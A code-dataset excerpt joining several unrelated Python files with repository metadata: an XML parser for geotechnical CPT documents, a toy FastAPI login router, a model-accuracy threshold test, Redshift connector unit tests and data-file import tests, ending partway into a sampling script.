        matrix, keeping only lines with exactly ``rows`` columns."""
        lines = data.split(';')
        lines = [line.split(',') for line in lines]
        lines = [line for line in lines if len(line)==rows]
        # BUG FIX: np.float was a deprecated alias removed in NumPy 1.24;
        # use the builtin float, which is what the alias meant.
        return np.matrix(lines, dtype=float)
    def getCptMatrix(self):
        return self.cptMatrix
    # list of matrices
    def getDissipation(self):
        return self.dissipationMatrices
    # from lxml_to_dict, slightly adjusted the implementation to remove some tags
    @staticmethod
    def lxml_to_dict(element):
        """Recursively convert an element tree into nested dicts, skipping
        'values' leaves and non-element nodes (e.g. comments)."""
        ret = {}
        # BUG FIX: getchildren() is deprecated (removed from ElementTree in
        # Python 3.9); iterate/len the element directly instead.
        if len(element) == 0:
            tag = BhpDocumentParser.stripNSFromTagName(element.tag)
            if (tag != 'values'):
                ret[tag] = element.text
        else:
            count = {}
            for elem in element:
                subdict = BhpDocumentParser.lxml_to_dict(elem)
                tag = BhpDocumentParser.stripNSFromTagName(element.tag)
                subtag = BhpDocumentParser.stripNSFromTagName(elem.tag)
                # subtag can only be None if the element tag is not a string
                # (could be a comment); skip those.
                if(subtag is None):
                    continue
                # Disambiguate repeated sibling tags by suffixing a counter.
                if ret.get(tag, False) and subtag in ret[tag].keys():
                    count[subtag] = count[subtag]+1 if count.get(subtag, False) else 1
                    elemtag = subtag+str(count[subtag])
                    subdict = {elemtag: subdict[subtag]}
                if ret.get(tag, False):
                    ret[tag].update(subdict)
                else:
                    ret[tag] = subdict
        return ret
    @classmethod
    def fromString(cls, xmlString):
        """Alternate constructor: parse from an XML string."""
        return cls(etree.fromstring(xmlString))
    @classmethod
    def fromFile(cls, xmlFile):
        """Alternate constructor: parse from a file path / file object."""
        return cls(etree.parse(xmlFile))
    def generateNsMap(self):
        """Collect all namespace prefixes as {prefix: '{url}'}."""
        for _, elem in etree.iterwalk(self.xmlTree, events = ('start-ns',)):
            ns, url = elem
            self.nsMap[ns] = '{' + url + '}'
    def getCptParametersMap(self):
        """Return the CPT survey parameters dict from metadata, or None."""
        registrationRequest = self.metadata['registrationRequest']
        if (registrationRequest is not None):
            sourceDocument = registrationRequest['sourceDocument']
            if (sourceDocument is not None):
                cpt = sourceDocument['CPT']
                if (cpt is not None):
                    conePenetrometerSurvey = cpt['conePenetrometerSurvey']
                    if (conePenetrometerSurvey is not None):
                        parameters = conePenetrometerSurvey['parameters']
                        if (parameters is not None):
                            return parameters
        return None
    def getElementByTag(self, tag):
        """Return the first element matching a namespaced 'ns:tag' string."""
        for _, elem in etree.iterwalk(self.xmlTree, events = ('end',), tag = self.getTag(tag)):
            return elem
        return None
    def isCPT(self):
        return self.isCPTRegistrationRequest
    def getChildElementByTagName(self, elem, name):
        """Return the first descendant of ``elem`` whose local name is ``name``."""
        for _, elem in etree.iterwalk(elem, events = ('end',)):
            if (name == BhpDocumentParser.stripNSFromTagName(elem.tag)):
                return elem
        return None
    # returns first element without ns matching the name param
    def getElementByTagName(self, name):
        for _, elem in etree.iterwalk(self.xmlTree, events = ('end',)):
            if (name == BhpDocumentParser.stripNSFromTagName(elem.tag)):
                return elem
        return None
    @staticmethod
    def stripNSFromTagName(name):
        """Drop a leading '{namespace}' from a tag; None for non-string tags."""
        if (isinstance(name, str)):
            return re.sub('{.*}', '', name)
        return None
    # returns list of elements without ns matching the name param
    def getListOfElementsByTagName(self, name):
        listOfElements = list()
        for _, elem in etree.iterwalk(self.xmlTree, events = ('end',)):
            if (name == BhpDocumentParser.stripNSFromTagName(elem.tag)):
                listOfElements.append(elem)
        if (len(listOfElements) != 0):
            return listOfElements
        return None
    def getTag(self, fullTag):
        """Translate 'prefix:tag' into '{url}tag' using the collected nsMap."""
        (ns, tag) = fullTag.strip().split(":")
        if (ns in self.nsMap):
            return self.nsMap[ns] + tag
        return None
    def toString(self):
        return etree.tostring(self.xmlTree, pretty_print = True).decode("utf-8")
    def stackedPrintOfStructure(self):
        """Debug helper: print every element path as a copy-pasteable dict index."""
        stack = list()
        for event, elem in etree.iterwalk(self.getRoot(), events=('start', 'end')):
            if (not isinstance(elem.tag, str)):
                continue
            if (event == 'start'):
                stack.append(elem.tag.split('}', 1)[1])
                mapIndex = ""
                # Print this in a way that it's easy to copy paste to get the proper metadata from the dictionary
                for item in stack:
                    mapIndex += "['%s']" % item
                print(mapIndex)
            else:
                stack.pop()
        return stack
| ZBoukich/brofiles | scripts/bhpdocumentparser.py | bhpdocumentparser.py | py | 6,683 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.matrix",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "numpy.float",
"line_number": 52,
"usage_type": "attribute"
},
{
"api_name": "lxml.etree.fromstring",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "lxml.etree",
... |
27068411013 | from fastapi import APIRouter, Body
from models.model import User, UserLogin
from auth.jwt_handler import signJWT
router = APIRouter(
tags = ["User Routes"]
)
users = []
@router.get("/")
def get():
    """Root endpoint; returns a static greeting payload."""
    payload = {"Hello": "Wob"}
    return payload
@router.post("/user/signup")
def user_signup(user: User = Body(default=None)):
    """Register a user in the in-memory ``users`` list and issue a JWT.

    NOTE: credentials are held in plain memory only — not persisted.
    """
    users.append(user)
    token = signJWT(user.email)
    return token
def check_user(data: UserLogin):
    """Return True when ``data`` matches a registered user's credentials."""
    return any(
        candidate.email == data.email and candidate.password == data.password
        for candidate in users
    )
@router.post("/user/login")
def user_login(user: UserLogin = Body(default=None)):
    """Issue a JWT for valid credentials; otherwise return an error payload."""
    if not check_user(user):
        return {
            "error": "Invalid login details"
        }
    return signJWT(user.email)
| Namikaze007/TodoFastapi | routes/users.py | users.py | py | 802 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "fastapi.APIRouter",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "models.model.User",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "fastapi.Body",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "auth.jwt_handler.sign... |
42778530183 | from unittest.mock import Mock, patch
import pytest
from redshift_connector.error import InterfaceError, OperationalError, ProgrammingError
from toucan_connectors.pagination import (
KnownSizeDatasetPaginationInfo,
OffsetLimitInfo,
PaginationInfo,
)
from toucan_connectors.redshift.redshift_database_connector import (
ORDERED_KEYS,
AuthenticationMethod,
AuthenticationMethodError,
RedshiftConnector,
RedshiftDataSource,
)
from toucan_connectors.toucan_connector import DataSlice
CLUSTER_IDENTIFIER: str = 'toucan_test'
DATABASE_NAME: str = 'toucan'
@pytest.fixture
def redshift_connector():
return RedshiftConnector(
authentication_method=AuthenticationMethod.DB_CREDENTIALS.value,
name='test',
host='http://localhost',
port=0,
cluster_identifier=CLUSTER_IDENTIFIER,
user='user',
password='sample',
default_database='dev',
connect_timeout=10,
)
@pytest.fixture
def redshift_connector_aws_creds():
return RedshiftConnector(
authentication_method=AuthenticationMethod.AWS_CREDENTIALS.value,
name='test',
host='localhost',
port=0,
db_user='db_user_test',
cluster_identifier=CLUSTER_IDENTIFIER,
access_key_id='access_key',
secret_access_key='secret_access_key',
session_token='token',
default_database='dev',
region='eu-west-1',
)
@pytest.fixture
def redshift_connector_aws_profile():
return RedshiftConnector(
authentication_method=AuthenticationMethod.AWS_PROFILE.value,
name='test',
host='localhost',
port=0,
db_user='db_user_test',
cluster_identifier=CLUSTER_IDENTIFIER,
profile='sample',
default_database='dev',
region='eu-west-1',
)
@pytest.fixture
def redshift_datasource():
return RedshiftDataSource(
domain='test',
name='redshift',
database=DATABASE_NAME,
query='SELECT * FROM public.sales;',
)
def test_config_schema_extra():
    """Config.schema_extra must reorder the schema's properties into the
    canonical ORDERED_KEYS order."""
    schema = {
        'properties': {
            'type': 'type_test',
            'name': 'name_test',
            'host': 'host_test',
            'port': 0,
            'cluster_identifier': 'cluster_identifier_test',
            'db_user': 'db_user_test',
            'connect_timeout': 'connect_timeout_test',
            'authentication_method': 'authentication_method_test',
            'user': 'user_test',
            'password': 'password_test',
            'default_database': 'dev',
            'access_key_id': 'access_key_id_test',
            'secret_access_key': 'secret_access_key_test',
            'session_token': 'session_token_test',
            'profile': 'profile_test',
            'region': 'region_test',
            'enable_tcp_keepalive': True,
        }
    }
    RedshiftConnector.Config().schema_extra(schema)
    assert schema['properties'] is not None
    # Compare the full key sequence at once: the original index loop only
    # checked the first len(keys) entries, so a too-long ORDERED_KEYS (missing
    # schema keys) passed silently.
    assert list(schema['properties'].keys()) == list(ORDERED_KEYS)
def test_redshiftdatasource_init_(redshift_datasource):
ds = RedshiftDataSource(domain='test', name='redshift', database='test')
assert ds.language == 'sql'
assert hasattr(ds, 'query_object')
@patch.object(RedshiftConnector, '_retrieve_tables')
def test_redshiftdatasource_get_form(redshift_connector, redshift_datasource):
current_config = {'database': 'dev'}
redshift_connector._retrieve_tables.return_value = ['table1', 'table2', 'table3']
result = redshift_datasource.get_form(redshift_connector, current_config)
assert result['properties']['parameters']['title'] == 'Parameters'
assert result['properties']['domain']['title'] == 'Domain'
assert result['properties']['validation']['title'] == 'Validation'
assert result['required'] == ['domain', 'name']
def test_redshiftconnector_get_connection_params_missing_authentication_mode():
with pytest.raises(ValueError) as exc_info_user:
RedshiftConnector(
name='test',
host='localhost',
cluster_identifier='sample',
port=0,
)
assert AuthenticationMethodError.UNKNOWN.value in str(exc_info_user.value)
def test_redshiftconnector_get_connection_params_db_cred_mode_missing_params():
with pytest.raises(ValueError) as exc_info_user:
RedshiftConnector(
authentication_method=AuthenticationMethod.DB_CREDENTIALS.value,
name='test',
cluster_identifier='sample',
host='localhost',
port=0,
password='pass',
)
assert AuthenticationMethodError.DB_CREDENTIALS.value in str(exc_info_user.value)
# TODO: Partial check due to missing context in some operations (Missing: password)
# with pytest.raises(ValueError) as exc_info_pwd:
# RedshiftConnector(
# authentication_method=AuthenticationMethod.DB_CREDENTIALS.value,
# name='test',
# cluster_identifier='sample',
# host='localhost',
# port=0,
# user='user',
# )
# assert AuthenticationMethodError.DB_CREDENTIALS.value in str(exc_info_pwd.value)
def test_redshiftconnector_get_connection_params_db_cred_mode(redshift_connector):
result = redshift_connector._get_connection_params(database='test')
assert result == dict(
host='localhost',
database='test',
cluster_identifier='toucan_test',
port=0,
timeout=10,
user='user',
password='sample',
tcp_keepalive=True,
)
def test_redshiftconnector_get_connection_params_aws_creds_mode_missing_params():
    """AWS-credentials auth must raise ValueError when access_key_id or db_user
    is missing."""
    # TODO: Partial check due to missing context in some operations (Missing: secret_access_key)
    # with pytest.raises(ValueError) as exc_info_secret:
    #     RedshiftConnector(
    #         authentication_method=AuthenticationMethod.AWS_CREDENTIALS.value,
    #         name='test',
    #         cluster_identifier='sample',
    #         host='localhost',
    #         port=0,
    #         db_user='db_user_test',
    #         access_key_id='access_key',
    #         session_token='token',
    #         region='eu-west-1',
    #     )
    # assert AuthenticationMethodError.AWS_CREDENTIALS.value in str(exc_info_secret.value)
    with pytest.raises(ValueError) as exc_info_key:
        RedshiftConnector(
            authentication_method=AuthenticationMethod.AWS_CREDENTIALS.value,
            name='test',
            cluster_identifier='sample',
            host='localhost',
            port=0,
            db_user='db_user_test',
            secret_access_key='secret_access_key',
            session_token='token',
            region='eu-west-1',
        )
    # Fix: compare against the enum's .value (a string), consistent with every
    # other assertion in this module — the bare enum member either fails the
    # membership test or raises TypeError if the enum is not a str subclass.
    assert AuthenticationMethodError.AWS_CREDENTIALS.value in str(exc_info_key.value)
    with pytest.raises(ValueError) as exc_info_db_user:
        RedshiftConnector(
            authentication_method=AuthenticationMethod.AWS_CREDENTIALS.value,
            name='test',
            cluster_identifier='sample',
            host='localhost',
            port=0,
            access_key_id='access_key',
            secret_access_key='secret_access_key',
            session_token='token',
            region='eu-west-1',
        )
    assert AuthenticationMethodError.AWS_CREDENTIALS.value in str(exc_info_db_user.value)
def test_redshiftconnector_get_connection_params_aws_creds_mode(redshift_connector_aws_creds):
result = redshift_connector_aws_creds._get_connection_params(database='test')
assert result == dict(
host='localhost',
database='test',
port=0,
iam=True,
db_user='db_user_test',
cluster_identifier='toucan_test',
access_key_id='access_key',
secret_access_key='secret_access_key',
session_token='token',
region='eu-west-1',
tcp_keepalive=True,
)
def test_redshiftconnector_get_connection_params_aws_profile_mode_missing_params():
with pytest.raises(ValueError) as exc_info_profile:
RedshiftConnector(
authentication_method=AuthenticationMethod.AWS_PROFILE.value,
name='test',
cluster_identifier='toucan_test',
host='localhost',
port=0,
db_user='db_user_test',
region='eu-west-1',
)
assert AuthenticationMethodError.AWS_PROFILE.value in str(exc_info_profile.value)
with pytest.raises(ValueError) as exc_info_db_user:
RedshiftConnector(
authentication_method=AuthenticationMethod.AWS_PROFILE.value,
name='test',
cluster_identifier='sample',
host='localhost',
port=0,
profile='profile',
region='eu-west-1',
)
assert AuthenticationMethodError.AWS_PROFILE.value in str(exc_info_db_user.value)
def test_redshiftconnector_get_connection_params_aws_profile_mode(redshift_connector_aws_profile):
result = redshift_connector_aws_profile._get_connection_params(database='test')
assert result == dict(
host='localhost',
database='test',
port=0,
iam=True,
db_user='db_user_test',
cluster_identifier='toucan_test',
region='eu-west-1',
profile='sample',
tcp_keepalive=True,
)
@pytest.mark.parametrize('opt', (True, False))
def test_redshiftconnector_get_connection_tcp_keepalive(redshift_connector, opt: bool):
redshift_connector.enable_tcp_keepalive = opt
result = redshift_connector._get_connection_params(database='test')
assert result == dict(
host='localhost',
database='test',
cluster_identifier='toucan_test',
port=0,
timeout=10,
user='user',
password='sample',
tcp_keepalive=opt,
)
@patch.object(RedshiftConnector, '_get_connection')
def test_redshiftconnector_retrieve_tables(
mock_connection, redshift_connector, redshift_datasource
):
mock_connection().cursor().__enter__().fetchall.return_value = (
['table1'],
['table2'],
['table3'],
)
result = redshift_connector._retrieve_tables(database=redshift_datasource.database)
assert result == ['table1', 'table2', 'table3']
@patch.object(RedshiftConnector, '_get_connection')
@patch('toucan_connectors.redshift.redshift_database_connector.SqlQueryHelper')
def test_redshiftconnector_retrieve_data(
mock_SqlQueryHelper, mock_get_connection, redshift_connector, redshift_datasource
):
mock_response = Mock()
mock_SqlQueryHelper.count_query_needed.return_value = True
mock_SqlQueryHelper.prepare_limit_query.return_value = Mock(), Mock()
mock_SqlQueryHelper.prepare_count_query.return_value = Mock(), Mock()
mock_get_connection().cursor().__enter__().fetch_dataframe.return_value = mock_response
result = redshift_connector._retrieve_data(datasource=redshift_datasource, get_row_count=True)
assert result == mock_response
@patch.object(RedshiftConnector, '_get_connection')
@patch('toucan_connectors.redshift.redshift_database_connector.SqlQueryHelper')
def test_redshiftconnector_retrieve_data_empty_result(
mock_SqlQueryHelper, mock_get_connection, redshift_connector, redshift_datasource
):
mock_SqlQueryHelper.count_query_needed.return_value = True
mock_SqlQueryHelper.prepare_limit_query.return_value = Mock(), Mock()
mock_SqlQueryHelper.prepare_count_query.return_value = Mock(), Mock()
mock_get_connection().cursor().__enter__().fetch_dataframe.return_value = None
result = redshift_connector._retrieve_data(datasource=redshift_datasource, get_row_count=True)
assert result.empty is True
@patch.object(RedshiftConnector, '_get_connection')
@patch('toucan_connectors.redshift.redshift_database_connector.SqlQueryHelper')
def test_redshiftconnector_retrieve_data_without_count(
mock_SqlQueryHelper, mock_get_connection, redshift_connector, redshift_datasource
):
mock_response = Mock()
mock_SqlQueryHelper.prepare_limit_query.return_value = Mock(), Mock()
mock_get_connection().cursor().__enter__().fetch_dataframe.return_value = mock_response
result = redshift_connector._retrieve_data(datasource=redshift_datasource, limit=10)
assert result == mock_response
@patch.object(RedshiftConnector, '_retrieve_data')
def test_redshiftconnector_get_slice(mock_retreive_data, redshift_datasource, redshift_connector):
mock_df = Mock()
mock_df.__len__ = lambda x: 1
type(mock_df).total_rows = [10]
mock_retreive_data.return_value = mock_df
result = redshift_connector.get_slice(
data_source=redshift_datasource, permissions=None, offset=0, limit=1, get_row_count=True
)
assert result == DataSlice(
df=mock_df,
pagination_info=PaginationInfo(
parameters=OffsetLimitInfo(offset=0, limit=1),
pagination_info=KnownSizeDatasetPaginationInfo(total_rows=10, is_last_page=False),
next_page=OffsetLimitInfo(offset=1, limit=1),
),
)
@patch.object(RedshiftConnector, '_retrieve_data')
def test_redshiftconnector_get_slice_without_count(
mock_retreive_data, redshift_datasource, redshift_connector
):
mock_df = Mock()
mock_df.__len__ = lambda x: 10
mock_retreive_data.return_value = mock_df
result = redshift_connector.get_slice(data_source=redshift_datasource)
assert result == DataSlice(
df=mock_df,
pagination_info=PaginationInfo(
parameters=OffsetLimitInfo(offset=0, limit=None),
pagination_info=KnownSizeDatasetPaginationInfo(total_rows=10, is_last_page=True),
),
)
@patch.object(RedshiftConnector, '_retrieve_data')
def test_redshiftconnector_get_slice_df_is_none(
mock_retreive_data, redshift_datasource, redshift_connector
):
mock_retreive_data.return_value = None
result = redshift_connector.get_slice(data_source=redshift_datasource)
assert result == DataSlice(
df=None,
pagination_info=PaginationInfo(
parameters=OffsetLimitInfo(offset=0, limit=None),
pagination_info=KnownSizeDatasetPaginationInfo(total_rows=0, is_last_page=True),
),
)
def test_redshiftconnector__get_details(redshift_connector):
result = redshift_connector._get_details(index=0, status=True)
assert result == [
('Hostname resolved', True),
('Port opened', False),
('Authenticated', False),
('Default Database connection', False),
]
@patch.object(RedshiftConnector, 'check_hostname')
@patch.object(RedshiftConnector, 'check_port')
@patch('redshift_connector.connect')
def test_redshiftconnector_get_status_true(
    mock_connect, mock_check_port, mock_check_hostname, redshift_connector
):
    """get_status() reports success when hostname, port and connection checks
    all pass.

    Fix: @patch decorators are applied bottom-up, so the first mock parameter
    corresponds to the *lowest* decorator ('redshift_connector.connect'). The
    original parameter names were listed in the reverse order, attaching each
    return value to the wrong mock.
    """
    mock_check_hostname.return_value = 'hostname_test'
    mock_check_port.return_value = 'port_test'
    mock_connect.return_value = True
    result = redshift_connector.get_status()
    assert result.status is True
    assert result.error is None
@patch.object(RedshiftConnector, 'check_hostname')
def test_redshiftconnector_get_status_with_error_host(mock_hostname, redshift_connector):
mock_hostname.side_effect = InterfaceError('error mock')
result = redshift_connector.get_status()
assert type(result.error) is str
assert result.status is False
assert str(result.error) == 'error mock'
@patch.object(RedshiftConnector, 'check_port')
def test_redshiftconnector_get_status_with_error_port(mock_port, redshift_connector):
mock_port.side_effect = InterfaceError('error mock')
result = redshift_connector.get_status()
assert type(result.error) is str
assert result.status is False
assert str(result.error) == 'error mock'
@patch.object(RedshiftConnector, '_get_connection')
def test_redshiftconnector_describe(mock_connection, redshift_connector, redshift_datasource):
mock_description = Mock()
type(mock_description).description = [
(b'salesid', 23, None, None, None),
(b'listid', 23, None, None, None),
(b'pricepaid', 1700, None, None, None),
]
mock_connection().cursor().__enter__.return_value = mock_description
result = redshift_connector.describe(data_source=redshift_datasource)
expected = {'salesid': 'INTEGER', 'listid': 'INTEGER', 'pricepaid': 'DECIMAL'}
assert result == expected
def test_get_model(mocker, redshift_connector):
db_names_mock = mocker.patch.object(RedshiftConnector, '_list_db_names', return_value=['dev'])
table_info_mock = mocker.patch.object(RedshiftConnector, '_db_table_info_rows')
table_info_mock.return_value = [
('pg_internal', 'redshift_auto_health_check_436837', 'a', 'integer'),
('public', 'table_1', 'label', 'character varying'),
('public', 'table_1', 'doum', 'character varying'),
('public', 'table_1', 'value1', 'bigint'),
('public', 'table_2', 'label', 'character varying'),
('public', 'table_2', 'doum', 'character varying'),
('public', 'table_2', 'value1', 'bigint'),
('public', 'table_2', 'value2', 'bigint'),
('public', 'table_3', 'label', 'character varying'),
('public', 'table_3', 'group', 'character varying'),
]
assert redshift_connector.get_model() == [
{
'database': 'dev',
'schema': 'pg_internal',
'name': 'redshift_auto_health_check_436837',
'type': 'table',
'columns': [{'name': 'a', 'type': 'integer'}],
},
{
'database': 'dev',
'schema': 'public',
'name': 'table_1',
'type': 'table',
'columns': [
{'name': 'label', 'type': 'character varying'},
{'name': 'doum', 'type': 'character varying'},
{'name': 'value1', 'type': 'bigint'},
],
},
{
'database': 'dev',
'schema': 'public',
'name': 'table_2',
'type': 'table',
'columns': [
{'name': 'label', 'type': 'character varying'},
{'name': 'doum', 'type': 'character varying'},
{'name': 'value1', 'type': 'bigint'},
{'name': 'value2', 'type': 'bigint'},
],
},
{
'database': 'dev',
'schema': 'public',
'name': 'table_3',
'type': 'table',
'columns': [
{'name': 'label', 'type': 'character varying'},
{'name': 'group', 'type': 'character varying'},
],
},
]
db_names_mock.assert_called_once()
table_info_mock.assert_called_once_with('dev')
db_names_mock.reset_mock()
table_info_mock.reset_mock()
redshift_connector.get_model('other-db')
db_names_mock.assert_not_called()
table_info_mock.assert_called_once_with('other-db')
for error in [OperationalError, ProgrammingError]:
mocker.patch.object(RedshiftConnector, '_db_tables_info', side_effect=error('oups'))
assert redshift_connector.get_model() == []
def test_get_model_with_info(mocker, redshift_connector):
db_names_mock = mocker.patch.object(RedshiftConnector, '_list_db_names', return_value=['dev'])
list_table_info_mock = mocker.patch.object(
RedshiftConnector,
'_list_tables_info',
return_value=[
{
'database': 'dev',
'schema': 'public',
'type': 'table',
'name': 'cool',
'columns': [{'name': 'foo', 'type': 'bar'}, {'name': 'roo', 'type': 'far'}],
}
],
)
assert redshift_connector.get_model_with_info() == (
[
{
'columns': [{'name': 'foo', 'type': 'bar'}, {'name': 'roo', 'type': 'far'}],
'database': 'dev',
'name': 'cool',
'schema': 'public',
'type': 'table',
}
],
{},
)
db_names_mock.assert_called_once()
list_table_info_mock.assert_called_once_with('dev')
db_names_mock.reset_mock()
list_table_info_mock.reset_mock()
redshift_connector.get_model_with_info('other-db')
db_names_mock.assert_not_called()
list_table_info_mock.assert_called_once_with('other-db')
# on error
for error in [OperationalError, ProgrammingError]:
mocker.patch.object(RedshiftConnector, '_list_tables_info', side_effect=error('oups'))
assert redshift_connector.get_model_with_info() == (
[],
{'info': {'Could not reach databases': ['dev']}},
)
| ToucanToco/toucan-connectors | tests/redshift/test_redshift.py | test_redshift.py | py | 20,723 | python | en | code | 16 | github-code | 36 | [
{
"api_name": "toucan_connectors.redshift.redshift_database_connector.RedshiftConnector",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "toucan_connectors.redshift.redshift_database_connector.AuthenticationMethod.DB_CREDENTIALS",
"line_number": 27,
"usage_type": "attribute"
... |
39205903455 | import pytest
import yaml
import os
import json
def load_configuration(filename):
    """Load a YAML configuration file and return its parsed content.

    Uses yaml.safe_load: configuration files need only plain YAML types, and
    safe_load refuses arbitrary Python object construction (yaml.load requires
    an explicit loader precisely because FullLoader is only for trusted input).
    """
    with open(filename) as input_file:
        return yaml.safe_load(input_file)
def load_model_performance(filename):
    """Read a JSON file of model performance metrics and return the parsed
    object."""
    with open(filename, "r") as performance_file:
        return json.load(performance_file)
def test_ATTC_1a():
    """Threshold test: the candidate model's accuracy must meet the configured
    minimum target."""
    conf_parameters = load_configuration("tests/configuration.yml")
    candidate_model_performance = load_model_performance("tests/candidate_models_performance.json")
    # Measured accuracy of the candidate model.
    model_accuracy = candidate_model_performance["general_metrics"]["accuracy"]
    # Minimum acceptable accuracy declared in the configuration.
    minimal_accuracy = conf_parameters["target_metrics"]["accuracy"]
    assert model_accuracy >= minimal_accuracy
{
"api_name": "yaml.load",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "yaml.FullLoader",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "json.load",
"line_number": 14,
"usage_type": "call"
}
] |
39587111591 | import os
import unittest
import dateutil.parser
from dropmunch import munch_data, munch_spec
iso8601_timestamp1 = '2007-10-01T13:47:12.345Z'
valid_datafile_name = 'DATAspecvalid_{0}.txt'.format(iso8601_timestamp1)
class DataFileProcessing(unittest.TestCase):
    """Test validation and processing of data files."""
    # NOTE: the class docstring above was originally a stray string statement
    # placed after tearDown(), where it had no documentation effect.

    def setUp(self):
        # Fixture files live next to the test module.
        self.working_directory = os.getcwd() + '/fixtures/'
        self.munch_data = munch_data.MunchData(self.working_directory)
        self.munch_spec = munch_spec.MunchSpec(self.working_directory)

    def tearDown(self):
        # Keep the spec store clean between tests.
        self.munch_spec.delete_all_specs()

    def test_datafile_found_db_spec(self):
        """A data file whose spec exists in the DB yields a DatafileSpec."""
        spec_name = 'DATAspecvalid'
        spec_columns = [munch_spec.SpecColumn('color', 7, 'TEXT')]
        spec = munch_spec.Spec(spec_name, spec_columns)
        self.munch_spec.persist_spec(spec)
        datafile_spec = self.munch_data.get_datafile_spec(valid_datafile_name)
        self.assertIsNotNone(datafile_spec,
                             'providing a filename corresponding to a spec available in the db '
                             'produces a valid DatafileSpec object')

    def test_valid_datafile(self):
        """All rows of a well-formed data file are processed."""
        spec_name = 'DATAspecvalid'
        spec_columns = [munch_spec.SpecColumn('color', 7, 'TEXT'),
                        munch_spec.SpecColumn('sohot_rightnow', 1, 'BOOLEAN')]
        spec = munch_spec.Spec(spec_name, spec_columns)
        datafile_spec = munch_data.DataFileSpec(spec, dateutil.parser.parse('2007-10-01T13:47:12.345Z'))
        self.munch_spec.persist_spec(spec)
        import_log_row = self.munch_data.create_import_log(datafile_spec)
        datafile_spec = self.munch_data.get_datafile_spec(valid_datafile_name)
        # Fix: assertEquals is a deprecated alias removed in Python 3.12 —
        # use assertEqual (applies to every assertion in this class).
        self.assertEqual(self.munch_data.process_datafile(valid_datafile_name, datafile_spec, import_log_row['id']),
                         3,
                         '3 rows are processed from valid datafile')

    def test_padded_boolean_column(self):
        """Boolean columns padded with whitespace are still parsed."""
        self.munch_spec.process_spec_from_file('DATApaddedbool.csv')
        spec = self.munch_spec.load_spec_from_db('DATApaddedbool')
        datafile_spec = munch_data.DataFileSpec(spec, dateutil.parser.parse(iso8601_timestamp1))
        import_log_row = self.munch_data.create_import_log(datafile_spec)
        self.assertEqual(self.munch_data.process_datafile('DATApaddedbool_{0}.txt'.format(iso8601_timestamp1),
                                                          datafile_spec,
                                                          import_log_row['id']),
                         3,
                         '3 rows are processed from valid datafile')

    def test_invalid_datafile_row(self):
        """A malformed row is counted as a failure; the valid rows still process."""
        self.munch_spec.process_spec_from_file('DATAspecvalid.csv')
        spec = self.munch_spec.load_spec_from_db('DATAspecvalid')
        datafile_spec = munch_data.DataFileSpec(spec, dateutil.parser.parse(iso8601_timestamp1))
        import_log_row = self.munch_data.create_import_log(datafile_spec)
        filename = 'DATAspecvalid_{0}_badrow.txt'.format(iso8601_timestamp1)
        processed_row_count = self.munch_data.process_datafile(filename,
                                                               datafile_spec,
                                                               import_log_row['id'])
        self.assertEqual(processed_row_count,
                         2,
                         '2 rows are processed from valid datafile {0}'.format(filename))
        self.assertEqual(self.munch_data.row_failure_count,
                         1,
                         '1 row failed to be processed from datafile {0}'.format(filename))
### TODO - implement unit tests for invalid data conditions :
# def test_data_file_missing_db_spec_found_file_spec(self):
# """when data file's spec is found in filesystem, but
# not in the database a warning is logged and the data file is skipped"""
# self.assertTrue(False)
#
# def test_data_file_missing_spec(self):
# """when data file's spec isn't found in database or in the filesystem, an error is raised"""
# self.assertTrue(False)
#
# def test_data_file_empty(self):
# """when a data file is processed containing no rows, an error is raised"""
# self.assertTrue(False)
#
# def test_data_file_io_error(self):
# """when an io error occurs, an error is raised"""
# self.assertTrue(False)
#
# def test_data_column_invalid_datatype(self):
# """when a column can't be parsed using on the spec width and datatype, an error is raised"""
# self.assertTrue(False)
#
# def test_data_row_missing_characters(self):
# """when a row contains fewer characters than spec, an error is raised"""
# self.assertTrue(False)
#
# def test_data_row_extra_characters(self):
# """when a row contains more characters than spec, an error is raised"""
# self.assertTrue(False)
#
# def test_data_error_saving_to_db(self):
# """when an error occurs while saving data to the database, an error is raised"""
# self.assertTrue(False) | zharben/dropmunch | dropmunch/test/test_munch_data.py | test_munch_data.py | py | 5,174 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "unittest.TestCase",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "os.getcwd",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "dropmunch.munch_data.MunchData",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "dropmu... |
40657801370 | import torch
import numpy as np
import torch.nn.functional as F
from models import GetModel
from datagen import DataPool
from WGRutils import WGREnv, WandBScatterMaxlinePlot
import os
import wandb
import argparse
from datetime import datetime
from termcolor import colored
EPS = 1e-8
def temperature_schedule(args, timestep):
    """Linearly anneal the inverse temperature over the run.

    Interpolates from args.invtemp_min (timestep 0) to args.invtemp_max
    (timestep == args.timesteps).
    """
    progress = timestep / args.timesteps
    span = args.invtemp_max - args.invtemp_min
    return args.invtemp_min + span * progress
def query_score(env, seq):
    """Query the WGR environment for the energy of *seq*.

    The second argument disables the environment-side rendering that the final
    getEnergy(..., True) call in main() triggers — presumably a visualization
    flag; confirm against WGREnv.getEnergy.
    """
    return env.getEnergy(seq, False)
def init_wandb(args):
    """Start a Weights & Biases run for this evaluation and return the run
    handle; the full argparse namespace is logged as the run config."""
    run = wandb.init(project="WGR-DMGIBBS", config=args)
    return run
def main(args):
    """Run evaluation: load a trained forwarder/critic checkpoint, roll the
    generator forward for args.timesteps steps while scoring each sampled
    batch against the WGR environment, then trigger a final visualization.

    Requires args.resume to point at a checkpoint; exits otherwise.
    """
    # Set the device
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    # Initialize the data pool
    print(colored("[INFO] Initializing the data pool...", "green"))
    pool = DataPool(args.batch_size, args.seq_length, args.timesteps)
    env = WGREnv(args, args.seq_length)
    # pool.initialize()
    # Initialize the model
    print(colored("[INFO] Initializing the model...", "green"))
    forwarder, critic = GetModel(args)
    print(colored("[MODEL] Forward generator:", "red"))
    print(forwarder)
    print(colored("[MODEL] Score / entropy critic:", "red"))
    print(critic)
    # Move the model to the device
    print(colored("[INFO] Moving the model to the device...", "green"))
    forwarder = forwarder.to(device)
    critic = critic.to(device)
